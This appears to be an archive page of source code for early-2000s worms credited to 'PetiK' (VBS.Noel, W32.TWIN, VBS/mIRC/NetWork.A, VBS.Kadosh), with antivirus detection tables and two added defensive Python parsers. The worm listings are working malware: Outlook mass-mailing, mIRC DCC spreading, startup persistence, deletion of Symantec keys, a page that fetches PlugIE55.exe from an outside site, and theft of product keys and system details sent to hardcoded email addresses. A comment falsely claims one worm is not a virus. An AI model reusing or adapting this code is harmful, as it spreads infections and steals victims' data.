McAfee              5616             2009.05.15    VBS/Generic
McAfee+Artemis      5616             2009.05.15    VBS/Generic
McAfee-GW-Edition   6.7.6            2009.05.15    Worm.Petik.AV.03
Microsoft           1.4602           2009.05.16    Virus:VBS/Petik.I
NOD32               4080             2009.05.15    VBS/Petik.A
Norman              6.01.05          2009.05.16    VBS/GenMail.D
nProtect            2009.1.8.0       2009.05.16    VBS.Petik.A@mm
Panda               10.0.0.14        2009.05.16    VBS/I-Worm
PCTools             4.4.2.0          2009.05.16    VBS.Petik.I
Prevx               3.0              2009.05.16    -
Rising              21.29.52.00      2009.05.16    Worm.Hopalong
Sophos              4.41.0           2009.05.16    VBS/Judge
Sunbelt             3.2.1858.2       2009.05.16    -
Symantec            1.4.4.12         2009.05.16    VBS.Pet_Tick.B@mm
TheHacker           6.3.4.1.326      2009.05.15    -
TrendMicro          8.950.0.1092     2009.05.15    VBS_JUDGE.A
VBA32               3.12.10.5        2009.05.16    Email-Worm.Win32.Petik
ViRobot             2009.5.15.1737   2009.05.15    VBS.Worm-Family
VirusBuster         4.6.5.0          2009.05.16    VBS.Petik.I
(- = no detection)

Additional information
File size: 2587 bytes
MD5...: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257
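The detection tables in this archive are flattened scanner reports. As an added example (not part of PetiK's archive), here is a parser for the row-wise layout used for the Judge and Network reports (vendor, engine version, signature date, then a result that may be empty or several words such as "probably unknown SCRIPT"), plus a summary of how many engines fired and how many used a Petik-family name rather than a generic one. The sample report is constructed from a handful of the engines that appear on this page; its hashes are placeholders, and the "Petik-family" name list is my own choice.

```python
"""Parse a flattened VirusTotal-style report (row-wise layout) and summarise it.
Added example; not part of the PetiK archive."""
import re
from collections import Counter

DATE_RE = re.compile(r"^\d{4}\.\d{2}\.\d{2}$")   # signature-date token, e.g. 2009.05.16

# Constructed sample in the report layout used on this page; hashes are placeholders.
SAMPLE_REPORT = """File Sample.TXT.vbs received on 05.16.2009 17:42:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
CAT-QuickHeal 10.00 2009.05.15
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
DrWeb 5.0.0.12182 2009.05.16 modification of VBS.Petik
NOD32 4080 2009.05.15 probably unknown SCRIPT
Prevx 3.0 2009.05.16
Sophos 4.41.0 2009.05.16 VBS/Judge
Additional information File size: 2587 bytes
MD5...: 00000000000000000000000000000000 SHA1..: 0000000000000000000000000000000000000000"""


def parse_report(text):
    """Return (meta, rows): meta has file/size/md5/sha1 when present; each row is
    a dict with vendor, version, updated and result ('' means no detection)."""
    meta = {}
    for key, pattern, conv in (
        ("file", r"File (\S+) received on", str),
        ("size", r"File size: (\d+) bytes", int),
        ("md5", r"MD5\.*:\s*([0-9a-fA-F]{32})", str.lower),
        ("sha1", r"SHA1\.*:\s*([0-9a-fA-F]{40})", str.lower),
    ):
        m = re.search(pattern, text)
        if m:
            meta[key] = conv(m.group(1))

    tokens = text.split()
    # Rows sit between the header word "Result" and the "Additional information" trailer.
    start = tokens.index("Result") + 1 if "Result" in tokens else 0
    end = tokens.index("Additional") if "Additional" in tokens else len(tokens)

    rows, i = [], start
    while i < end:
        if i + 2 < end and DATE_RE.match(tokens[i + 2]):
            # vendor, version, date start a new row; the result (if any) follows
            rows.append({"vendor": tokens[i], "version": tokens[i + 1],
                         "updated": tokens[i + 2], "result": ""})
            i += 3
        else:
            if rows:   # result text may be empty or span several words
                rows[-1]["result"] = (rows[-1]["result"] + " " + tokens[i]).strip()
            i += 1
    return meta, rows


def summarise(rows):
    """Detection ratio and how many engines used a Petik-family name vs. a generic one."""
    detected = [r for r in rows if r["result"]]
    naming = Counter()
    for r in detected:
        if re.search(r"petik|pet_tick|pettick|judge", r["result"], re.I):
            naming["Petik-family name"] += 1
        else:
            naming["other/generic name"] += 1
    return {"engines": len(rows), "detections": len(detected),
            "ratio": round(len(detected) / len(rows), 2) if rows else 0.0,
            "naming": dict(naming)}


if __name__ == "__main__":
    meta, rows = parse_report(SAMPLE_REPORT)
    print(meta)
    for r in rows:
        print(f"{r['vendor']:<15} {r['updated']}  {r['result'] or '-'}")
    print(summarise(rows))
```

The row boundary is detected purely from the token two positions ahead being a signature date, which is why multi-word results and empty results both come out right; the column-wise layout used for some other reports on this page (all vendor names first, then all versions, and so on) cannot be aligned this way because engines with no result are simply omitted from the result column.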


Name : VBS.Noel
Author : PetiK
Language : VBS
Date : 12/12/2000

Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy("C:\NOEL.GIF.vbs") EMAIL() End Sub Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "JOUYEUX NOEL" msg.Body = "Voici une photodu PERE NOEL" msg.Attachments.Add ("C:\NOEL.GIF.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "Panda34@caramail.com; Pif878@aol.com" nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner") CN = CreateObject("WScript.NetWork").ComputerName msg2.Subject = "Message de """ & nom & """ alias " & CN & "" page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey") msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """" msg2.Send End Sub

File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1728 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.J1 Worm/Win32.Win32 VBS/Petik.M@mm VBS:MailWorm-gen VBS/VBSWG Generic.ScriptWorm.A79766E0 VBS/Petik.M Worm.Win32.Email-Worm.Petik modification of VBS.Generic.458 VBS/Buggy VBS/Petik.M@mm Email-Worm.Win32.Petik VBS/Petik.J@mm Generic.ScriptWorm.A79766E0 Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.vbs W32/PetTick.vbs Worm.Petik.J1 Virus:VBS/Petik.J probably unknown SCRIPT VBS/GenMail.D VBS.Petik.B@mm VBS.Petik.J Worm.Hopalong VBS/Petik-J VBS.LoveLetter.Var VBS_GENERIC.009 Email-Worm.Win32.Petik VBS.Worm-Family VBS.Petik.J

Additional information
File size: 1352 bytes
MD5...: fcc75e971157a8d9103b5bc583847f87
SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5

comment $
W32.TWIN by PetiK, 20/12/2000

TO COMPILE:
tasm32 /M /ML ?????.asm
tlink32 -Tpe -x -aa ?????.obj,,,import32
$

.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC

.data
fh      dd ?
octets  dd ?
regDisp dd 0
regResu dd 0
l       dd 0
p       dd 0
szBAT   db 260 dup (0)
szCopie db 260 dup (0)
szOrig  db 260 dup (0)
szHTM   db 260 dup (0)
szVBS   db 260 dup (0)
szWin   db 260 dup (0)
Copie   db "\NAV5.exe",00h
BATFILE db "\IE55.bat",00h
HTMFILE db "\IE55.htm",00h
VBSFILE db "\IE55.vbs",00h
Winini  db "\\WIN.INI",00h
run     db "run",00h
windows db "windows",00h
CLE     db "Software\[PetiK]",00h
CLE2    db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2    db "Start Page",00h

vbsd: db 'rem IE55.vbs pour W32.TWiN',0dh,0ah db '',0dh,0ah db 'Dim fso,ws,file',0dh,0ah db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah db 'ws.Run (sys&"\IE55.htm")',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\' db 'Download Directory","C:\"',0dh,0ah db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\' db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah

db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\' db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah db 'End If',0dh,0ah db 'MIRC()',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db 'Sub MIRC()',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah db ' Set c = (sys&"\NAV5.exe")',0dh,0ah db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah db ' srpt.WriteLine "[script]"',0dh,0ah db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah db ' srpt.WriteLine "n3=}"',0dh,0ah db ' srpt.Close',0dh,0ah db 'End If',0dh,0ah db 'End Sub',0dh,0ah vbstaille equ $-vbsd htmd: db '<HTML><HEAD>',0dh,0ah db '<TITLE>Plugin pour Internet Explorer / ' db 'Plugin for Internet Explorer</TITLE>',0dh,0ah db '<SCRIPT language="JavaScript">',0dh,0ah db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah db 'temps = 10;',0dh,0ah db '',0dh,0ah db 'function affiche()',0dh,0ah db '{ if (temps-- == 0) ',0dh,0ah db ' { clearInterval(attente);',0dh,0ah db ' location.href=site;',0dh,0ah db ' return;',0dh,0ah db ' }',0dh,0ah db ' document.forms[0].elements[0].value = temps;',0dh,0ah db '}',0dh,0ah db '</SCRIPT>',0dh,0ah db ' ',0dh,0ah db '</HEAD>',0dh,0ah db '<BODY bgColor=black text=red onload='''attente = setInterval' db '("affiche()", 1000);'''>',0dh,0ah db '<DIV align=center>',0dh,0ah db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah db '</DIV>',0dh,0ah db '<DIV align=left>',0dh,0ah db '<HR SIZE=4>',0dh,0ah db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah db '<HR SIZE=1>',0dh,0ah db '</DIV>v db '<DIV align=center>',0dh,0ah db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> 
secondes</BIG>',0dh,0ah db '</FORM></DIV></BODY></HTML>',0dh,0ah htmtaille equ $-htmd batd: db '@echo off',0dh,0ah db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h battaille equ $-batd .code DEBUT: mov call cmp jne eax, offset CLE REG [regDisp],1 FIN 0 GetModuleHandleA 260 offset szOrig eax GetModuleFileNameA 260 offset szCopie GetWindowsDirectoryA ; Checks whether a [PetiK] key exists in HKLM\Software. If it is not there, the program copies itself and then modifies the WIN.INI file

WCOPIE: push call push push push call push push call

; The program copies itself into the computer's WINDOWS folder under the name NAV5.exe

push push call push push push call WIN_INI:push push call push push call push push push push call BAT: push push call push push call push push push push push push push call mov push push push push push call push call push push call push push call push push push push push push push call mov push push push push push call push call push push call push push call push push push push

offset Copie offset szCopie lstrcat 0 offset szCopie offset szOrig CopyFileA 260 offset szWin GetWindowsDirectoryA offset Winini offset szWin lstrcat offset szWin offset szCopie offset run offset windows WritePrivateProfileStringA 260 offset szBAT GetSystemDirectoryA offset BATFILE offset szBAT lstrcat 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset szBAT CreateFileA [fh],eax 00h offset octets battaille offset batd [fh] WriteFile [fh] CloseHandle 260 offset szVBS GetSystemDirectoryA offset VBSFILE offset szVBS lstrcat 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset szVBS CreateFileA [fh],eax 00h offset octets vbstaille offset vbsd [fh] WriteFile [fh] CloseHandle 260 offset szHTM GetSystemDirectoryA offset HTMFILE offset szHTM lstrcat 00000000h 00000080h 00000002h 00000000h

; Create a file named IE55.VBS in the SYSTEM directory
; Create a file named IE55.HTM in the SYSTEM directory
; Put an entry in the WIN.INI file so that the program is activated at every startup.
; This avoids using the REGISTRY, which is too conspicuous.
; In WIN.INI of the WINDOWS folder:
; [windows]
; run="program name"

VBS:

HTM:

push push push call mov push push push push push call push call BDR:

00000001h 40000000h offset szHTM CreateFileA [fh],eax 00h offset octets htmtaille offset htmd [fh] WriteFile [fh] CloseHandle ; ;


push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000001h call RegCreateKeyExA push 05h push offset szVBS push 01h push 0 push offset NOM2 push p call RegSetValueExA push 0 call RegCloseKey jmp FIN push offset regDisp push offset regResu push 0 push 0F003FH push 0 push 0 push 0 push eax push 80000002h call RegCreateKeyExA push [regResu] call RegCloseKey ret push 0 call ExitProcess


; HKEY_CURRENT_USER
; Create a key in the Registry so that the VBS file is activated when the user goes on the Internet

REG:

; default security descriptor
; KEY_ALL_ACCESS

; address of the sub-key
; HKEY_LOCAL_MACHINE
; End of the program

FIN:

end DEBUT
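A defender's counterpart to the WIN.INI start-up trick described in the comments above: the following Python, added here as an example and not part of PetiK's archive, parses a win.ini text and lists whatever the [windows] section's run= and load= lines would launch at logon. The sample win.ini is constructed; the NAV5.exe name is the one the source above copies itself to. Keys with the same names outside the [windows] section are ignored on purpose, since only that section is honoured at start-up.

```python
"""List the programs a Win9x-era WIN.INI would auto-start from its [windows]
section (run= and load=). Added example; the sample file is constructed."""

SAMPLE_WIN_INI = """; constructed win.ini
[windows]
load=
run=C:\\WINDOWS\\NAV5.exe
NullPort=None
[Desktop]
Wallpaper=(None)
run=C:\\not\\autostart.exe
"""


def winini_autostart_entries(text):
    """Return the programs named on run=/load= lines of the [windows] section.
    Only that section counts; the same keys in other sections are ignored."""
    section = None
    found = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                       # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "windows" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() in ("run", "load") and value:
                # WIN.INI lists several programs space-separated on one line
                found.extend(value.split())
    return found


if __name__ == "__main__":
    for prog in winini_autostart_entries(SAMPLE_WIN_INI):
        print("auto-started from WIN.INI:", prog)
```

Because run= and load= take a space-separated list, a path containing a space cannot be expressed there, so splitting on whitespace is the correct reading of the format rather than a shortcut.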

IE55.HTM

<HTML><HEAD>
<TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE>
<SCRIPT language="JavaScript">
site="http://www.multimania.com/kadosh/PlugIE55.exe ";
temps = 10;

function affiche()
{ if (temps-- == 0)
  { clearInterval(attente);
    location.href=site;
    return;
  }
  document.forms[0].elements[0].value = temps;
}
</SCRIPT>
</HEAD>
<BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'>
<DIV align=center>
<H1>Plugin pour Microsoft Internet Explorer</H1>
<H1>Plugin for Microsoft Internet Explorer</H1>
</DIV>
<DIV align=left>
<HR SIZE=4>
<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>
<H3>Please download the plugin in C:\ path</H3>
<HR SIZE=1>
</DIV>
<DIV align=center>
<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>
</FORM></DIV></BODY></HTML>


Name : VBS/mIRC/NetWork.A
Author : PetiK
Language : VBS
Date : 29/12/2000

'VBS/mIRC/NetWork.A by PetiK
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") Set c = fso.GetFile(WScript.ScriptFullName) NetWork = (win&"\Network.vbs") c.Copy (NetWork) ws.RegWrite RS,NetWork 'NORTON() MIRC() ESPION() EMAIL() End Sub Sub NORTON() ws.RegDelete ("HKLM\Software\Symantec\") ws.RegDelete ("HKCU\Software\Symantec\") End Sub Sub ESPION() Set win = fso.GetSpecialFolder(0) Set A = CreateObject("Outlook.Application") Set B = A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D = 1 To C.AddressEntries.Count Set E = C.Addressentries(D) Next End If Next ComputerName = CreateObject("WScript.NetWork").ComputerName NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName") REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper") DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut") PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory") Set aze = fso.CreateTextFile ("C:\ESPION.txt",true) aze.WriteLine "Information sur l'ordinateur" aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName aze.WriteLine "NOM D'UTILISATEUR : " & NOM aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2 aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3 aze.WriteLine "PAPIER 
PEINT DE BUREAU : " & PPDB aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES" aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name aze.WriteLine "ADDRESSE : " & E.Address aze.WriteBlankLines(2) aze.WriteLine "Information sur internet" aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR End Sub Sub MIRC() On Error Resume Next NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") script = ("C:\script.ini") Set srpt = fso.CreateTextFile(script, true)

srpt.WriteLine "[script]; par PetiK " srpt.WriteLine "n0=on 1:JOIN:#:{" srpt.WriteLine "n1= /if ( $nick == $me ) { halt }" srpt.WriteLine "n2= /dcc send $nick " & NET2 srpt.WriteLine "n3=}" srpt.Close fso.CopyFile script, "C:\mirc\script.ini" fso.CopyFile script, "C:\mirc32\script.ini" fso.CopyFile script, "C:\program files\mirc\script.ini" fso.CopyFile script, "C:\program files\mirc32\script.ini" fso.DeleteFile ("C:\script.ini") End Sub Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "NetWork Game for WINDOWS" msg.Body = "The new game for your computer arrives" msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com" msg2.Subject = "Message écrit le " & date msg2.Body = "Il était " & time msg2.Attachments.Add ("C:\ESPION.txt") msg2.Send fso.DeleteFile ("C:\ESPION.txt") End Sub

File Network.vbs received on 05.16.2009 17:59:59 (CET)

Antivirus           Version          Last Update   Result
a-squared           4.0.0.101        2009.05.16    Email-Worm.Win32.Petik!IK
AhnLab-V3           5.0.0.2          2009.05.16    VBS/Petik
AntiVir             7.9.0.168        2009.05.15    Worm/Petik.K1
Antiy-AVL           2.0.3.1          2009.05.15    Worm/Win32.Petik
Authentium          5.1.2.4          2009.05.16    VBS/Petik.L@mm
Avast               4.8.1335.0       2009.05.15    VBS:MailWorm-gen
AVG                 8.5.0.336        2009.05.15    I-Worm/Petik
BitDefender         7.2              2009.05.16    Generic.ScriptWorm.892F765D
CAT-QuickHeal       10.00            2009.05.15    VBS/Petik.L
ClamAV              0.94.1           2009.05.16    Worm.VBS-14
Comodo              1157             2009.05.08    Worm.Win32.Email-Worm.Petik
DrWeb               5.0.0.12182      2009.05.16    modification of W97M.Necronom
eSafe               7.0.17.0         2009.05.14    VBS.Scramble.
eTrust-Vet          31.6.6508        2009.05.16    VBS/Buggy
F-Prot              4.4.4.56         2009.05.16    VBS/Petik.L@mm
F-Secure            8.0.14470.0      2009.05.15    Email-Worm.Win32.Petik
Fortinet            3.117.0.0        2009.05.16    VBS/PETIK.K1
GData               19               2009.05.16    Generic.ScriptWorm.892F765D
Ikarus              T3.1.1.49.0      2009.05.16    Email-Worm.Win32.Petik
K7AntiVirus         7.10.737         2009.05.16    -
Kaspersky           7.0.0.125        2009.05.16    Email-Worm.Win32.Petik
McAfee              5616             2009.05.15    VBS/Generic
McAfee+Artemis      5616             2009.05.15    VBS/Generic
McAfee-GW-Edition   6.7.6            2009.05.15    Worm.Petik.K1
Microsoft           1.4602           2009.05.16    Virus:VBS/Petik.K
NOD32               4080             2009.05.15    probably unknown SCRIPT
Norman              6.01.05          2009.05.16    VBS/GenMail.D
nProtect            2009.1.8.0       2009.05.16    VBS.Petik.C@mm
Panda               10.0.0.14        2009.05.16    VBS/Generic.worm
PCTools             4.4.2.0          2009.05.16    VBS.Petik.K
Prevx               3.0              2009.05.16    -
Rising              21.29.52.00      2009.05.16    Worm.Hopalong
Sophos              4.41.0           2009.05.16    VBS/Petik-K
Sunbelt             3.2.1858.2       2009.05.16    -
Symantec            1.4.4.12         2009.05.16    VBS.Pet_Tick.gen
TheHacker           6.3.4.1.326      2009.05.15    -
TrendMicro          8.950.0.1092     2009.05.15    VBS_PETIK.K1
VBA32               3.12.10.5        2009.05.16    -
ViRobot             2009.5.15.1737   2009.05.15    -
(- = no detection)

Additional information
File size: 4245 bytes
MD5...: af1121c899b152b95520214e4873e466
SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db


Name : VBS.Kadosh
Author : PetiK
Language : VBS
Date : 06/01/2001

VBS/Kadosh.A by PandaKiller
This file copies itself into the WINDOWS directory under the name WINEXEC.EXE.VBS and into the SYSTEM directory as winRun.dll.vbs.
It changes the web start page and sets it to LIVE.MULTIMANIA.COM.
WARNING : Norton detects this program as the virus VBS.NewLove.A.
IT IS NOT A VIRUS : IT DESTROYS NOTHING.

DEBUT() Sub DEBUT() Set a = CreateObject("Scripting.FileSystemObject") Set win = a.GetSpecialFolder(0) Set sys = a.GetSpecialFolder(1) Set c = a.GetFile(WScript.ScriptFullName) c.Copy(win&"\WinExec.exe.vbs") c.Copy(sys&"\WinRun.dll.vbs") INTERNET() EMAIL() msgbox "Le tour du monde en 20 jours",vbinformation End Sub ' CHANGES THE INTERNET START PAGE Sub INTERNET() Set W = Wscript.CreateObject("WScript.Shell") W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "live.multimania.com" W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec", "C:\WINDOWS\WinExec.exe.vbs" End Sub ' SENDS A COPY OF ITSELF TO EVERY RECIPIENT IN THE ADDRESS BOOK Sub EMAIL() Set K = CreateObject("Outlook.Application") Set L = K.GetNameSpace("MAPI") For Each M In L.AddressLists If M.AddressEntries.Count <> 0 Then Set N = K.CreateItem(0) For O = 1 To M.AddressEntries.Count Set P = M.AddressEntries(O) If O = 1 Then N.BCC = P.Address Else N.BCC = N.BCC & "; " & P.Address End If Next N.Subject = "Le Tour du Monde" N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite" Set Q = CreateObject("Scripting.FileSystemObject") N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs") N.Send End If Next End Sub

File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1728 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10 Result Email-Worm.Win32.Petik!IK Worm/Petik.05 Worm/Win32.Win32 VBS/Petik.W@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.EDFACDDC VBS/Petik.W Worm.Win32.Email-Worm.Petik WORM.Virus VBS/Sodak VBS/Petik.W@mm Email-Worm.Win32.Petik VBS/Petik.M@mm Generic.ScriptWorm.EDFACDDC Email-Worm.Win32.Petik VBS.Generic.MassMailer Email-Worm.Win32.Petik VBS/Generic@MM VBS/Generic@MM Worm.Petik.05 Virus:VBS/Petik.L probably unknown SCRIPT VBS/Autorun.AP VBS.Petik.D@mm VBS.Petik.L Worm.Hopalong VBS/Petik-L VBS.LoveLetter.Var VBS_GENERIC.001 Email-Worm.Win32.Petik VBS.Worm-Family VBS.Petik.L

Additional information
File size: 1683 bytes
MD5...: 763d1411edc603a60b7fdd2f63d77579
SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49


Name : VBS.ShowVar
Author : PetiK
Language : VBS
Date : 17/01/2001

Copies itself to %WINDIR%\Showvar.vbs
